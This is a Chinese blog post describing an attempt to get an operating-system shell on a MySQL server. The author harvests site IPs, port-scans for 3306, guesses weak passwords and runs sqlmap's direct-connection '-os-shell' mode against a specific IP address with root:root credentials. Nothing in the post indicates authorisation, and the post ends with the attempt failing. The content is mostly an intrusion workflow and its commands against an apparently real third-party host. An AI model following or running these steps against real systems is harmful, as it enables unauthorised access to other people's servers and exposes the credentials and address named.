sqlmap拿3306的shell

前提

首先采集网站url,然后通过url域名转化为ip,再通过端口扫描探测出想要的端口,比如3306

然后进行弱口令探测

然后我探测出某弱口令

拿shell

登上服务器,首先安装sqlmap

wget https://github.com/sqlmapproject/sqlmap/tarball/master

tar -zxvf master
cd sqlmapproject-sqlmap-de63238/
成功
python2 sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell

提示报错


image.png

需要“python pymysql”第三方库

python2 -m pip install pymysql
报错

换了一台服务器 python2.6.6

python sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell

先安装pip

curl https://bootstrap.pypa.io/2.6/get-pip.py -o get-pip.py

python get-pip.py

pip install pymysql

再次运行 还是不行


image.png

网上参考到直接github下载组件


组件

我直接本机安装 然后可以运行了 不过把MySQL服务判断为了oracle


orcale

....结局利用sqlmap拿shell失败

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,316评论 0 5
  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,529评论 2 22
  • sqlmap使用攻略及技巧分享
    sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功...
    道书简阅读 5,281评论 0 0
  • 无标题文章
    # Python 资源大全中文版 我想很多程序员应该记得 GitHub 上有一个 Awesome - XXX 系列...
    小迈克阅读 8,133评论 1 3
  • 极迅云课(服务端教案)
    一、Python简介和环境搭建以及pip的安装 4课时实验课主要内容 【Python简介】: Python 是一个...
    _小老虎_阅读 11,117评论 0 10